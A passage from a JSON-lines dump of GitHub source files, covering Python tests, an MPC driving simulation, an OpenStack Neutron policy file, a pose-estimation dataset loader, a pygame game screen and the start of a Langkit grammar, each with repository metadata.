\"crm.agency_cabinet.ord.server.src.procedures.ReportExport\",\n return_value=mock,\n ):\n input_pb = request_pb2.RpcRequest(\n report_export=reports_pb2.ReportExportInput(\n agency_id=1,\n report_id=1\n )\n )\n\n result = await handler(input_pb.SerializeToString())\n\n assert reports_pb2.ReportExportOutput.FromString(result) == expected_message\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crm/tests/handlers/test_export_report.py","file_name":"test_export_report.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26268451687","text":"#!/usr/bin/python\nfrom __future__ import print_function\n\nimport argparse\nimport os\nimport sys\nfrom pprint import pprint\n\ndirroot = os.path.dirname(\n os.path.dirname(\n os.path.realpath(__file__)))\n\nsys.path.extend([os.path.join(dirroot, 'retrieval'),\n os.path.join(dirroot, 'preprocess')])\n\nfrom acser import Acser\nfrom fipser import Fipser\n\nclass Acorn(object):\n def __init__(self):\n self.fips = Fipser()\n self.acs = Acser()\n \n def resolve(self, loc, schema=None):\n f = self.resolve_fips(loc)\n g = self.resolve_geo(f, schema)\n \n return {'fips': f,\n 'geoid': g}\n\n def resolve_fips(self, loc):\n f = self.fips.resolve(loc)\n return f\n\n def resolve_geo(self, fips, schema=None):\n s, c, p = fips['state_fips'], fips['county_fips'], fips['place_fips']\n g = self.acs.geo_lookup(s, c, p, schema)\n \n return g\n\ndef _get_args():\n parser = argparse.ArgumentParser(description='Resolve a place name into FIPS \\\n Codes and GeoID')\n parser.add_argument('place', metavar='loc', type=str,\n help='A string of the location to resolve')\n \n parser.add_argument('--schema', nargs='?', type=str, \n default=None, help='The schema to use to resolve geoheaders.')\n\n args = parser.parse_args()\n return args\n\ndef main():\n ac = Acorn()\n args = _get_args()\n \n result = ac.resolve(args.place, args.schema)\n\n print(args.place, args.schema)\n print('\\t', end='')\n pprint(result, indent=2)\n\nif __name__ == '__main__':\n main()\n","repo_name":"giantoak/acorn","sub_path":"acorn/retrieval/acorn.py","file_name":"acorn.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5512914809","text":"import globals\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport do_mpc\nfrom casadi import *\nfrom casadi.tools import *\n\nimport sys\n\nfrom model import simple_bicycle_model\nfrom map import Map, Obstacle\nfrom reference_path import ReferencePath\nfrom simulator import Simulator\nfrom MPC import MPC\n\nsys.path.append('../../')\n\n\ndef environment_setup(map):\n\n # Load map file\n map = Map(file_path=map, origin=[-1, -2], resolution=0.005)\n\n # Specify waypoints\n waypoints_x = [-0.75, -0.25, -0.25, 0.25, 0.25, 1.25, 1.25, 0.75, 0.75, 1.25, 1.25, -0.75, -0.75, -0.25]\n waypoints_y = [-1.5, -1.5, -0.5, -0.5, -1.5, -1.5, -1, -1, -0.5, -0.5, 0, 0, -1.5, -1.5]\n\n # Specify path resolution\n path_resolution = 0.05 # m / wp\n\n # Create smoothed reference path\n reference_path = ReferencePath(\n map,\n waypoints_x,\n waypoints_y,\n path_resolution,\n smoothing_distance=5,\n max_width=0.23,\n circular=True,\n )\n\n # add obstacles to the map - more can be added if necessary\n obs1 = Obstacle(cx=0.0, cy=0.05, radius=0.05)\n obs2 = Obstacle(cx=-0.85, cy=-0.5, radius=0.07)\n obs3 = Obstacle(cx=-0.75, cy=-1.5, radius=0.06)\n obs4 = Obstacle(cx=-0.35, cy=-1.0, radius=0.08)\n obs5 = Obstacle(cx=0.35, cy=-1.0, radius=0.02)\n obs6 = Obstacle(cx=0.78, cy=-1.47, radius=0.06)\n obs7 = Obstacle(cx=0.73, cy=-0.9, radius=0.03)\n obs8 = Obstacle(cx=1.2, cy=0.0, radius=0.04)\n obs9 = Obstacle(cx=0.67, cy=-0.05, radius=0.07)\n map.add_obstacles([obs1, obs2, obs3, obs4, obs5, obs6, obs7, obs8, obs9])\n\n return reference_path\n\n\ndef MPC_Problem_setup(reference_path, ay_max=4.0, a_min=-1, a_max=1):\n # model setup\n vehicle = simple_bicycle_model(\n length=0.12, width=0.06, reference_path=reference_path, Ts=0.05\n )\n vehicle.model_setup()\n\n controller = MPC(vehicle)\n\n sim = Simulator(vehicle)\n\n # compute the vehicle speed profile based on speed and acceleration constraints\n speed_constraints = {\n 'a_min': a_min,\n 'a_max': a_max,\n 'v_min': 0.0,\n 'v_max': 1.0,\n 'ay_max': ay_max,\n }\n vehicle.reference_path.compute_speed_profile(speed_constraints)\n\n return vehicle, controller, sim\n\n\nif __name__ == '__main__':\n\n ''' User settings: '''\n show_animation = True\n\n map = 'maps/sim_map.png'\n\n # set up the map/ assign the waypoints/ add obstacles\n reference_path = environment_setup(map)\n\n # initiate the vehicle, controller and simulator objects\n vehicle, controller, sim = MPC_Problem_setup(reference_path)\n\n # set initial state\n x0 = np.array([vehicle.reference_path.waypoints[0].x, vehicle.reference_path.waypoints[0].y,\n vehicle.reference_path.waypoints[0].psi, 0.3, 0])\n controller.mpc.x0 = x0\n sim.simulator.x0 = x0\n controller.mpc.set_initial_guess()\n\n '''\n Main MPC Loop\n '''\n t = 0\n while globals.s < reference_path.length:\n # get control inputs and update the distance covered by the vehicle\n u = controller.get_control(x0)\n x0 = sim.simulator.make_step(u)\n controller.update_distance(x0)\n\n # plot the path and update the driveable area of the environment\n x_predicted = controller.mpc.data.prediction(('_x', 'pos_x'), t_ind=t)[0]\n y_predicted = controller.mpc.data.prediction(('_x', 'pos_y'), t_ind=t)[0]\n reference_path.show(x_predicted, y_predicted)\n sim.show(x0)\n\n # update boundary constraints for the next time step\n controller.constraints()\n t += 1\n\n plt.axis('off')\n plt.pause(0.001)\n\n input('Press any key to exit.')\n","repo_name":"omprabhu31/mpc_self_driving_cars","sub_path":"mpc-path-planning/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8670496081","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom neutron_lib import policy as neutron_policy\nfrom oslo_policy import policy\n\nfrom neutron.conf.policies import base\n\nDEPRECATED_REASON = (\n \"The default security group rules API supports \"\n \"system scope and default roles.\")\n\n\nCOLLECTION_PATH = '/default-security-group-rules'\nRESOURCE_PATH = '/default-security-group-rules/{id}'\n\n\nrules = [\n policy.DocumentedRuleDefault(\n name='create_default_security_group_rule',\n check_str=base.ADMIN,\n scope_types=['project'],\n description='Create a templated of the security group rule',\n operations=[\n {\n 'method': 'POST',\n 'path': COLLECTION_PATH,\n },\n ],\n deprecated_rule=policy.DeprecatedRule(\n name='create_default_security_group_rule',\n check_str=neutron_policy.RULE_ADMIN_ONLY,\n deprecated_reason=DEPRECATED_REASON,\n deprecated_since='2023.2')\n ),\n policy.DocumentedRuleDefault(\n name='get_default_security_group_rule',\n # NOTE(slaweq): it can't be ADMIN_OR_PROJECT_READER constant from the\n # base module because that is using \"project_id\" in the check string\n # and this resource don't belongs to any project thus such\n # check string would fail enforcement.\n check_str='role:reader',\n scope_types=['project'],\n description='Get a templated of the security group rule',\n operations=[\n {\n 'method': 'GET',\n 'path': COLLECTION_PATH,\n },\n {\n 'method': 'GET',\n 'path': RESOURCE_PATH,\n },\n ],\n deprecated_rule=policy.DeprecatedRule(\n name='get_default_security_group_rule',\n check_str=neutron_policy.RULE_ANY,\n deprecated_reason=DEPRECATED_REASON,\n deprecated_since='2023.2')\n ),\n policy.DocumentedRuleDefault(\n name='delete_default_security_group_rule',\n check_str=base.ADMIN,\n scope_types=['project'],\n description='Delete a templated of the security group rule',\n operations=[\n {\n 'method': 'DELETE',\n 'path': RESOURCE_PATH,\n },\n ],\n deprecated_rule=policy.DeprecatedRule(\n name='delete_default_security_group_rule',\n check_str=neutron_policy.RULE_ADMIN_ONLY,\n deprecated_reason=DEPRECATED_REASON,\n deprecated_since='2023.2')\n ),\n]\n\n\ndef list_rules():\n return rules\n","repo_name":"openstack/neutron","sub_path":"neutron/conf/policies/default_security_group_rules.py","file_name":"default_security_group_rules.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"5245940471","text":"import os\nimport torch.utils.data as data\nimport numpy as np\nimport torch\nimport cv2\nimport pickle\nfrom utils.image import flip, shuffle_lr, get_affine_transform, affine_transform\nfrom utils.image import draw_gaussian, adjust_aspect_ratio\nfrom utils.image import transform_preds\n\nclass ThreeDPW(data.Dataset):\n def __init__(self, opt, split):\n print('==> initializing 3D {} data.'.format(split))\n self.data_path = os.path.join(opt.data_dir, '3dpw', 'sequenceFiles', split)\n self.num_joints = 16\n self.acc_idxs = [0, 1, 2, 3, 4, 5, 10, 11, 14, 15]\n self.shuffle_ref = [[0, 5], [1, 4], [2, 3], \n [10, 15], [11, 14], [12, 13]]\n self.mean = np.array([0.485, 0.456, 0.406], np.float32).reshape(1, 1, 3)\n self.std = np.array([0.229, 0.224, 0.225], np.float32).reshape(1, 1, 3)\n self.edges = [[0, 1], [1, 2], [2, 6], [6, 3], [3, 4], [4, 5], \n [10, 11], [11, 12], [12, 8], [8, 13], [13, 14], [14, 15], \n [6, 8], [8, 9]]\n self.edges_3d = [[3, 2], [2, 1], [1, 0], [0, 4], [4, 5], [5, 6], \\\n [0, 7], [7, 8], [8, 10],\\\n [16, 15], [15, 14], [14, 8], [8, 11], [11, 12], [12, 13]]\n annot = {}\n tags = ['image','joints','center','scale']\n self.files = os.listdir(self.data_path)\n self.split = split\n self.opt = opt\n\n def _load_image(self, index):\n with open(os.path.join(self.data_path, self.files[index]), 'rb') as f:\n data = pickle.load(f, encoding='latin1')\n sequence = data['sequence']\n img_id = data['img_frame_ids']\n # assuming image filename is in format sequence_imgid.jpg\n image_filename = \"{}_{}.jpg\".format(sequence, img_id)\n image_path = os.path.join(self.opt.data_dir, '3dpw', 'imageFiles', sequence, image_filename)\n img = cv2.imread(image_path)\n return img, data\n\n def _get_part_info(self, data):\n pts = np.array(data['poses2d']).copy().astype(np.float32)\n c = np.mean(pts, axis=0)\n s = max(pts[:, 0].max() - pts[:, 0].min(), pts[:, 1].max() - pts[:, 1].min())\n return pts, c, s\n \n def __getitem__(self, index):\n img, data = self._load_image(index)\n pts, c, s = self._get_part_info(data)\n r = 0\n\n # Transformations as in MPII\n if self.split == 'train':\n sf = self.opt.scale\n rf = self.opt.rotate\n s = s * np.clip(np.random.randn()*sf + 1, 1 - sf, 1 + sf)\n r = np.clip(np.random.randn()*rf, -rf*2, rf*2) if np.random.random() <= 0.6 else 0\n\n trans_input = get_affine_transform(c, s, r, [self.opt.input_w, self.opt.input_h])\n inp = cv2.warpAffine(img, trans_input, (self.opt.input_w, self.opt.input_h),\n flags=cv2.INTER_LINEAR)\n\n trans_output = get_affine_transform(c, s, r, [self.opt.output_w, self.opt.output_h])\n out = np.zeros((self.num_joints, self.opt.output_h, self.opt.output_w), dtype=np.float32)\n\n for i in range(self.num_joints):\n if pts[i, 0] > 0 or pts[i, 1] > 0:\n pt = affine_transform(pts[i], trans_output)\n out[i] = draw_gaussian(out[i], pt, self.opt.hm_gauss)\n\n inp = (inp.astype(np.float32) / 255.)\n inp = (inp - self.mean) / self.std\n inp = inp.transpose(2, 0, 1)\n \n return inp, out\n\n def __len__(self):\n return len(self.files)\n \n def convert_eval_format(self, pred, conf, meta):\n ret = np.zeros((pred.shape[0], pred.shape[1], 2))\n for i in range(pred.shape[0]):\n ret[i] = transform_preds(\n pred[i], meta['center'][i].numpy(), meta['scale'][i].numpy(), \n [self.opt.output_h, self.opt.output_w])\n return ret\n","repo_name":"MeghanaChillara0203/pytorch-pose-hg-3d_CLASSPROJECT","sub_path":"src/lib/datasets/threedpw.py","file_name":"threedpw.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"17496587825","text":"import weakref\n\nfrom twisted.enterprise.util import DBError\n\nclass Reflector:\n \"\"\"Base class for enterprise reflectors. This implements row caching.\n \"\"\"\n populated = 0\n\n def __init__(self, rowClasses):\n \"\"\"\n Initialize me against a database.\n\n @param rowClasses: a list of row class objects that describe the\n database schema.\n \"\"\"\n\n self.rowCache = weakref.WeakValueDictionary() # does not hold references to cached rows.\n self.rowClasses = rowClasses\n self.schema = {}\n self._populate()\n\n def __getstate__(self):\n d = self.__dict__.copy()\n del d['rowCache']\n return d\n\n def __setstate__(self, state):\n self.__dict__ = state\n self.rowCache = weakref.WeakValueDictionary()\n self._populate()\n\n def _populate(self):\n \"\"\"Implement me to populate schema information for the reflector.\n \"\"\"\n raise DBError(\"not implemented\")\n\n def populateSchemaFor(self, tableInfo):\n \"\"\"This is called once for each registered rowClass to add it\n and its foreign key relationships for that rowClass to the\n schema.\"\"\"\n\n self.schema[ tableInfo.rowTableName ] = tableInfo\n\n # add the foreign key to the foreign table.\n for foreignTableName, childColumns, parentColumns, containerMethod, autoLoad in tableInfo.rowForeignKeys:\n self.schema[foreignTableName].addForeignKey(childColumns,\n parentColumns, tableInfo.rowClass,\n containerMethod, autoLoad)\n\n def getTableInfo(self, rowObject):\n \"\"\"Get a TableInfo record about a particular instance.\n\n This record contains various information about the instance's\n class as registered with this reflector.\n\n @param rowObject: a L{RowObject} instance of a class previously\n registered with me.\n @raises twisted.enterprise.row.DBError: raised if this class was not\n previously registered.\n \"\"\"\n try:\n return self.schema[rowObject.rowTableName]\n except KeyError:\n raise DBError(\"class %s was not registered with %s\" % (\n rowObject.__class__, self))\n\n def buildWhereClause(self, relationship, row):\n \"\"\"util method used by reflectors. builds a where clause to link a row to another table.\n \"\"\"\n whereClause = []\n for i in range(0,len(relationship.childColumns)):\n value = getattr(row, relationship.parentColumns[i][0])\n whereClause.append( [relationship.childColumns[i][0], EQUAL, value] )\n return whereClause\n\n def addToParent(self, parentRow, rows, tableName):\n \"\"\"util method used by reflectors. adds these rows to the parent row object.\n If a rowClass does not have a containerMethod, then a list attribute \"childRows\"\n will be used.\n \"\"\"\n parentInfo = self.getTableInfo(parentRow)\n relationship = parentInfo.getRelationshipFor(tableName)\n if not relationship:\n raise DBError(\"no relationship from %s to %s\" % ( parentRow.rowTableName, tableName) )\n\n if not relationship.containerMethod:\n if hasattr(parentRow, \"childRows\"):\n for row in rows:\n if row not in parentRow.childRows:\n parentRow.childRows.append(row)\n else:\n parentRow.childRows = rows\n return\n\n if not hasattr(parentRow, relationship.containerMethod):\n raise DBError(\"parent row (%s) doesnt have container method <%s>!\" % (parentRow, relationship.containerMethod))\n\n meth = getattr(parentRow, relationship.containerMethod)\n for row in rows:\n meth(row)\n\n ####### Row Cache ########\n\n def addToCache(self, rowObject):\n \"\"\"NOTE: Should this be recursive?! requires better container knowledge...\"\"\"\n self.rowCache[ rowObject.getKeyTuple() ] = rowObject\n\n def findInCache(self, rowClass, kw):\n keys = []\n keys.append(rowClass.rowTableName)\n for keyName, keyType in rowClass.rowKeyColumns:\n keys.append( kw[keyName] )\n keyTuple = tuple(keys)\n return self.rowCache.get(keyTuple)\n\n def removeFromCache(self, rowObject):\n \"\"\"NOTE: should this be recursive!??\"\"\"\n key = rowObject.getKeyTuple()\n if self.rowCache.has_key(key):\n del self.rowCache[key]\n\n ####### Row Operations ########\n\n def loadObjectsFrom(self, tableName, parent=None, data=None,\n whereClause=[], loadChildren=1):\n \"\"\"Implement me to load objects from the database.\n\n @param whereClause: a list of tuples of (columnName, conditional, value)\n so it can be parsed by all types of reflectors. eg.::\n whereClause = [(\"name\", EQUALS, \"fred\"), (\"age\", GREATERTHAN, 18)]\n \"\"\"\n raise DBError(\"not implemented\")\n\n def updateRow(self, rowObject):\n \"\"\"update this rowObject to the database.\n \"\"\"\n raise DBError(\"not implemented\")\n\n def insertRow(self, rowObject):\n \"\"\"insert a new row for this object instance.\n \"\"\"\n raise DBError(\"not implemented\")\n\n def deleteRow(self, rowObject):\n \"\"\"delete the row for this object from the database.\n \"\"\"\n raise DBError(\"not implemented\")\n\n# conditionals\nEQUAL = 0\nLESSTHAN = 1\nGREATERTHAN = 2\nLIKE = 3\n\n\n__all__ = ['Reflector', 'EQUAL', 'LESSTHAN', 'GREATERTHAN', 'LIKE']\n","repo_name":"ActiveState/OpenKomodoIDE","sub_path":"contrib/twisted/TwistedCore-2.4.0/twisted/enterprise/reflector.py","file_name":"reflector.py","file_ext":"py","file_size_in_byte":5624,"program_lang":"python","lang":"en","doc_type":"code","stars":460,"dataset":"github-code","pt":"72"} +{"seq_id":"466910499","text":"# coding: utf-8\n\nfrom __future__ import unicode_literals, absolute_import, division, print_function\n\nimport pytest\n\nfrom travel.rasp.train_api.train_partners.base.train_details.utils import set_pets, OWNER_DOSS, BRAND_LASTOCHKA\n\nOWNER_FPK = 'ФПК'\nBRAND_BAIKAL = 'Байкал'\n\n\nclass Coach(object):\n def __init__(self, pet_in_coach, pet_places_only):\n self.pet_in_coach = pet_in_coach\n self.pet_places_only = pet_places_only\n self.pets_allowed = False\n self.pets_segregated = False\n\n\nclass ExpectedCoach(object):\n def __init__(self, pets_allowed, pets_segregated):\n self.pets_allowed = pets_allowed\n self.pets_segregated = pets_segregated\n\n\n@pytest.mark.parametrize('coach_owner, train_brand, coaches, expected_coaches', (\n (OWNER_FPK, BRAND_BAIKAL, [Coach(False, False), Coach(False, False)],\n [ExpectedCoach(False, False), ExpectedCoach(False, False)]),\n\n (OWNER_FPK, BRAND_BAIKAL, [Coach(False, False), Coach(True, False)],\n [ExpectedCoach(False, False), ExpectedCoach(True, False)]),\n\n (OWNER_DOSS, BRAND_LASTOCHKA, [Coach(False, False), Coach(False, False)],\n [ExpectedCoach(False, False), ExpectedCoach(False, False)]),\n\n (OWNER_DOSS, BRAND_LASTOCHKA, [Coach(False, False), Coach(True, False)],\n [ExpectedCoach(False, False), ExpectedCoach(False, True)]),\n\n (OWNER_DOSS, BRAND_LASTOCHKA, [Coach(False, False), Coach(False, True)],\n [ExpectedCoach(False, False), ExpectedCoach(True, True)]),\n\n (OWNER_DOSS, BRAND_LASTOCHKA, [Coach(False, False), Coach(True, False), Coach(False, True)],\n [ExpectedCoach(False, False), ExpectedCoach(False, True), ExpectedCoach(True, True)])\n))\ndef test_set_pets(coach_owner, train_brand, coaches, expected_coaches):\n coaches_with_pets = set_pets(coach_owner, train_brand, coaches)\n\n for index, coach in enumerate(coaches_with_pets):\n check_coach(coach, expected_coaches[index])\n\n\ndef check_coach(actual_coach, expected_coach):\n assert actual_coach.pets_allowed == expected_coach.pets_allowed\n assert actual_coach.pets_segregated == expected_coach.pets_segregated\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/train_partners/base/train_details/utils/test_set_pets.py","file_name":"test_set_pets.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15804123217","text":"from random import choice\nimport pygame\n\nfrom settings import settings\nfrom score import score\nfrom player import player\nfrom sprite_group import groups\nfrom blood import blood \n\n\ndef check_player_collision():\n \"\"\"Check if player collides with a mob.\"\"\"\n if not player.is_invulnerable:\n mobs_hitbox_hitten = pygame.sprite.groupcollide(\n groups[\"mobs_hitbox\"], \n groups[\"player_hitbox\"], \n False, False)\n for mob_hitbox in mobs_hitbox_hitten.keys():\n for mob in groups[\"mobs\"].sprites():\n if mob.hitbox == mob_hitbox:\n if not mob.is_invincible:\n player.hp -= 1\n if player.hp == 0:\n player_dead()\n else:\n choice(settings.player_sounds[\"hit\"]).play()\n player.go_invulnerable()\n\ndef player_dead():\n \"\"\"\n Empty mob_hitbox, mobs and heart groups, reset settings and for the player:\n - Play death sound\n - Set status to Death\n - Set is_dying to True.\n - Slow down animation speed\n \"\"\"\n choice(settings.player_sounds[\"death\"]).play().set_volume(0.5)\n player.frame_index = 0\n player.status = \"Death\"\n player.is_dying = True\n player.animation_speed = 0.1\n groups[\"mobs_hitbox\"].empty()\n groups[\"mobs\"].empty()\n groups[\"heart\"].remove(blood)\n settings.reset()\n\ndef set_and_draw_intro_background():\n \"\"\"Set and draw the background of the intro screen.\"\"\"\n intro_background_surf = pygame.Surface(settings.screen_size)\n pygame.Surface.fill(intro_background_surf, \"#207a6b\")\n intro_background_rect = intro_background_surf.get_rect(topleft = (0,0))\n settings.screen.blit(intro_background_surf,intro_background_rect)\n\ndef set_and_draw_intro_avatar():\n \"\"\"Set and draw the avatar of the intro screen.\"\"\"\n avatar_center = (600,150)\n avatar_surf = pygame.image.load(\n \"graphics/Knight/Idle/idle1.png\").convert_alpha()\n avatar_surf = pygame.transform.scale2x(avatar_surf)\n avatar_rect = avatar_surf.get_rect(center=avatar_center)\n settings.screen.blit(avatar_surf, avatar_rect)\n\ndef set_and_draw_intro_scrore():\n \"\"\"Set and draw current score on the intro screen.\"\"\"\n score_str = f\"Your score: {score.user_score}\"\n score_surf = pygame.font.Font.render(\n settings.intro_font,\n score_str,\n False,\n settings.intro_color\n )\n score_rect = score_surf.get_rect(topleft=(20, 120))\n settings.screen.blit(score_surf, score_rect)\n\ndef set_and_draw_intro_best_scrore():\n \"\"\"Set and draw best score on the intro screen.\"\"\"\n best_score_str = f\"Best score: {score.best_score}\" \n best_score_surf = pygame.font.Font.render(\n settings.intro_font,\n best_score_str,\n False,\n settings.intro_color\n )\n best_score_rect = best_score_surf.get_rect(topleft=(20, 60))\n settings.screen.blit(best_score_surf, best_score_rect)\n\ndef set_and_draw_intro_title():\n \"\"\"Set and draw intro screen's title.\"\"\"\n title_str = \"You are ambushed!!!\"\n title_surf = pygame.font.Font.render(\n settings.intro_font,\n title_str,\n False,\n settings.intro_color\n )\n title_rect = title_surf.get_rect(midtop=(settings.screen_width/2, 20))\n settings.screen.blit(title_surf, title_rect)\n\ndef set_and_draw_intro_controls():\n \"\"\"Set and draw the controls on the intro screen.\"\"\"\n controls = [\"Left / Right: Arrows\", \"Jump: up arrow\",\"Attack: Space bar\", \"Super Attack: left shift\"]\n for index, control in enumerate(controls):\n surf = pygame.font.Font.render(\n settings.intro_font,\n control,\n False,\n settings.intro_color\n )\n y_pos = 80 + 60 * index \n rect = surf.get_rect(topleft=(20, y_pos))\n settings.screen.blit(surf, rect)\n\ndef set_and_draw_intro_start():\n start_str = \"Hit Return to start\"\n start_surf = pygame.font.Font.render(\n settings.intro_font, \n start_str,\n False,\n settings.intro_color\n )\n start_rect = start_surf.get_rect(midtop=(settings.screen_width/2, 320))\n settings.screen.blit(start_surf, start_rect)\n\ndef draw_intro_screen():\n \"\"\"Draw the intro screen.\"\"\"\n set_and_draw_intro_background()\n set_and_draw_intro_avatar()\n if settings.game_started:\n set_and_draw_intro_scrore()\n set_and_draw_intro_best_scrore()\n else:\n set_and_draw_intro_title()\n set_and_draw_intro_controls()\n set_and_draw_intro_start()\n","repo_name":"OGR-67/ambush","sub_path":"game_over.py","file_name":"game_over.py","file_ext":"py","file_size_in_byte":4619,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30680802193","text":"def face():\n\timport jetson.inference\n\timport jetson.utils\n\n\tnet = jetson.inference.detectNet(\"ssd-mobilenet-v2\", threshold=0.5)\n\tcamera = jetson.utils.videoSource(\"csi://0\") # '/dev/video0' for V4L2\n\tdisplay = jetson.utils.videoOutput(\"display://0\") # 'my_video.mp4' for file\n\n\twhile display.IsStreaming():\n\t\timg = camera.Capture()\n\t\tdetections = net.Detect(img)\n\t\tfor detection in detections:\n\t\t\tif (net.GetClassDesc(detection.ClassID) == \"person\"):\n\t\t\t\treturn\n\t\tdisplay.Render(img)\n\t\tdisplay.SetStatus(\"Object Detection | Network {:.0f} FPS\".format(net.GetNetworkFPS()))\nface()\n\t\n","repo_name":"leowong1120/ceng3410_project","sub_path":"my_detection.py","file_name":"my_detection.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"25809220446","text":"i = int(input('Digite os termos: '))\nn = int(1)\nna = int(0)\nnb = int(0)\nc = int(0)\nif i == 1:\n print('0')\nwhile c < i-1:\n nb = n\n n = na + n\n if c == 0:\n print('0', end=' -> ')\n print(f'{nb}',end=' -> ')\n na = nb\n c += 1\nprint('FIM')","repo_name":"eduardoschmitt/Python-3-Curso-em-V-deo","sub_path":"ex063.py","file_name":"ex063.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41221532411","text":"class Solution:\n def addToArrayForm(self, A: List[int], K: int) -> List[int]:\n s=\"\"\n for i in range(len(A)):\n s+=str(A[i])\n l=str(int(s)+K)\n res=[]\n for i in l:\n res.append(i)\n return res\n \n","repo_name":"Lazy-coder-Hemlock/Leet_Code-Solutions","sub_path":"989. Add to Array-Form of Integer.py","file_name":"989. Add to Array-Form of Integer.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34140606","text":"from __future__ import absolute_import, division, print_function\n\nfrom langkit.dsl import (\n ASTNode, abstract, Field, T, Bool, LexicalEnv, synthetic, Struct,\n UserField, NullField, Symbol, LogicVar, Annotations\n)\nfrom langkit.envs import EnvSpec, add_env, add_to_env_kv, handle_children\nfrom langkit.expressions import (\n Self, Entity, langkit_property, Property, AbstractProperty, Not, No, If,\n ArrayLiteral, String, Var, AbstractKind, Let, Bind, LogicTrue, LogicFalse,\n Or, And, PropertyError, ignore, Try, Cond, Predicate, DynamicVariable,\n bind, CharacterLiteral\n)\n\n\nclass Renaming(Struct):\n from_symbol = UserField(type=T.Symbol)\n to_symbol = UserField(type=T.Symbol)\n\n\nclass Substitution(Struct):\n from_symbol = UserField(type=T.Symbol)\n to_term = UserField(type=T.Term)\n\n\nclass Template(Struct):\n origin = UserField(type=T.Term)\n instance = UserField(type=T.Term)\n new_symbols = UserField(type=T.Symbol.array)\n\n\nclass Binding(Struct):\n target = UserField(type=T.Term)\n domain_val = UserField(type=T.Term)\n\n\nclass UnifyEquation(Struct):\n eq = UserField(type=T.Equation)\n renamings = UserField(type=Renaming.array)\n\n\nclass DomainEquation(Struct):\n eq = UserField(type=T.Equation)\n templates = UserField(type=T.Identifier.array)\n\n\nclass UnifyQuery(Struct):\n first = UserField(type=T.Term)\n second = UserField(type=T.Term)\n\n\nclass TypingsDescription(Struct):\n bindings = UserField(type=T.Binding.array)\n equations = UserField(type=T.UnifyQuery.array)\n new_symbols = UserField(type=T.Symbol.array)\n\n\nclass UnificationContext(Struct):\n symbols = UserField(type=T.Symbol.array)\n vars = UserField(type=T.LogicVarArray)\n self_parent = UserField(type=T.Term)\n other_parent = UserField(type=T.Term)\n\n\nclass HigherOrderUnificationContext(Struct):\n arg = UserField(type=T.Term)\n res = UserField(type=T.Term)\n\n\nclass ExtractionContext(Struct):\n target = UserField(type=T.Symbol)\n first_context = UserField(type=T.Term)\n second_context = UserField(type=T.Term)\n\n\nclass ConstrainedTerm(Struct):\n term = UserField(type=T.Term)\n constraints = UserField(type=Substitution.array)\n\n\nclass Constructor(Struct):\n template = UserField(type=Template)\n substs = UserField(type=Substitution.array)\n\n\nclass SynthesisContext(Struct):\n intros = UserField(type=T.Introduction.array)\n bound_generics = UserField(type=T.Symbol.array)\n\n\nclass SynthesizationHole(Struct):\n sym = UserField(type=T.Symbol)\n domain_val = UserField(type=T.Term)\n ctx = UserField(type=SynthesisContext)\n\n\nclass SynthesizationAttempt(Struct):\n term = UserField(type=T.Term)\n holes = UserField(type=SynthesizationHole.array)\n free_symbols = UserField(type=T.Symbol.array)\n\n\nunification_context = DynamicVariable(\n \"unification_context\", type=UnificationContext\n)\n\nho_unification_context = DynamicVariable(\n \"ho_unification_context\", type=HigherOrderUnificationContext\n)\n\nextraction_context = DynamicVariable(\n \"extraction_context\", type=ExtractionContext\n)\n\nsynthesis_context = DynamicVariable(\n \"synthesis_context\", type=SynthesisContext\n)\n\n\n@abstract\nclass DependzNode(ASTNode):\n \"\"\"\n Root node class for Dependz AST nodes.\n \"\"\"\n @langkit_property(public=True)\n def make_ident(name=T.Symbol):\n return Self.unit.root.make_ident_from_self(name)\n\n @langkit_property(public=True)\n def make_apply(t1=T.Term, t2=T.Term):\n return Self.unit.root.make_apply_from_self(t1, t2)\n\n @langkit_property(public=True)\n def make_abstraction(id=T.Identifier, rhs=T.Term):\n return Self.unit.root.make_abstraction_from_self(id, rhs)\n\n @langkit_property(public=True)\n def make_arrow(t1=T.Term, t2=T.Term,\n t3=(T.Term, No(T.Term))):\n return Self.unit.root.make_arrow_from_self(t1, t2, t3)\n\n @langkit_property()\n def make_nested_intro(name=T.Identifier, dom=T.Term,\n bound_generics=T.Symbol.array):\n return Self.unit.root.make_nested_intro_from_self(name, dom,\n bound_generics)\n\n @langkit_property(return_type=T.LogicVarArray, memoized=True)\n def make_logic_var_array():\n return LogicVarArray.new()\n\n @langkit_property(memoized=True, return_type=T.SyntheticId)\n def make_ident_from_self(name=T.Symbol):\n return SyntheticId.new(name=name)\n\n @langkit_property(memoized=True, return_type=T.SyntheticApply)\n def make_apply_from_self(t1=T.Term, t2=T.Term):\n return SyntheticApply.new(lhs=t1, 